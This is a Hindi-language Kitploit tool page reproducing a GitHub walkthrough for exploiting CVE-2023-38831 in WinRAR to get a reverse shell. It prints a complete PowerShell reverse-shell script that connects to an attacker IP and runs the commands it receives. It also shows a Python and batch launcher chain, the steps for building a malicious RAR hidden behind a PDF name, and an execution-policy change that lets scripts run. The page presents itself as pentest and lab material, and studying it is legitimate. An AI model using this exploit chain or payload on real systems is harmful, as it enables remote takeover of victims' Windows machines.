Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38831_ReverseShell_Winrar-RCE — 6.23 से पहले के संस्करणों में winrar की CVE-2023-38831 भेद्यता का शोषण करके reverse shell प्राप्त करने के लिए आवश्यक कदम | Kitploit
उपकरण/GitHubGitHub/maalfer/cve-2023-38831_reverseshell_winrar-rce
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubmaalfer/cve-2023-38831_reverseshell_winrar-rce

CVE-2023-38831_ReverseShell_Winrar-RCE

6.23 से पहले के संस्करणों में winrar की CVE-2023-38831 भेद्यता का शोषण करके reverse shell प्राप्त करने के लिए आवश्यक कदम

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2282 साल पहलेKitploit द्वारा समीक्षित

WINRAR की CVE-2023-38831 भेद्यता का शोषण करके REVERSE SHELL प्राप्त करना

इस रिपॉजिटरी में हम winrar की CVE-2023-38831 भेद्यता का शोषण करने जा रहे हैं ताकि हम Windows पीड़ित मशीन से Kali Linux हमलावर मशीन पर reverse shell प्राप्त कर सकें।

प्रारंभिक चरण

हम इस रिपॉजिटरी की सामग्री डाउनलोड करते हैं:

imagen

इसके बाद, हमें इस भेद्यता का शोषण करने के लिए आवश्यक Python निर्भरताएँ निम्नलिखित कमांड्स के साथ स्थापित करनी होंगी:

root@kitploit:~
pip install rarce

imagen

तैयारी

हम revshells.com वेबसाइट से प्राप्त एक दुर्भावनापूर्ण कोड निष्पादित करने जा रहे हैं जो हमें reverse shell प्रदान करेगा (संबंधित हमलावर का IP और पोर्ट प्रदान करके):

https://www.revshells.com/

imagen

root@kitploit:~
$LHOST = "192.168.0.36"; $LPORT = 443; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

हम इस powershell कोड को एक .ps1 फ़ाइल में सहेजते हैं (इसे बाद में निष्पादित किया जाएगा):

imagen

reverse shell प्राप्त करने के लिए ps1 में कोड प्राप्त करने के बाद, हम एक python फ़ाइल बनाते हैं जो os लाइब्रेरी का उपयोग करके .ps1 फ़ाइल को निष्पादित करने का कार्य करती है:

imagen

फिर, हम निम्नलिखित कोड के साथ एक .bat फ़ाइल बनाते हैं:

imagen

root@kitploit:~

rem Ruta al ejecutable de Python
set PYTHON_EXECUTABLE=python.exe

rem Ruta al script de Python que deseas ejecutar
set PYTHON_SCRIPT=pwned.py

rem Ejecutar el script de Python
%PYTHON_EXECUTABLE% %PYTHON_SCRIPT%

rem Pausa para que puedas ver la salida antes de que se cierre la ventana
pause

शोषण

इस बिंदु पर हमें दुर्भावनापूर्ण winrar बनाना होगा:

imagen

हम .rar के अंदर documento.pdf फ़ाइल को निष्पादित करते हैं:

imagen

imagen

अंत में, यदि हम एक हमलावर मशीन से netcat के साथ सुनते रहते हैं, तो हमें reverse shell प्राप्त हो चुकी होगी:

imagen

संभावित त्रुटियों का समाधान:

यदि powershell कमांड निष्पादित नहीं कर पा रहे हैं, तो हमारे सिस्टम पर स्क्रिप्ट निष्पादन सक्षम करना आवश्यक है:

imagen

imagen

हम इसे सक्षम करते हैं:

imagen

और निम्नलिखित कमांड निष्पादित करते हैं:

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

टूल डाउनलोड करें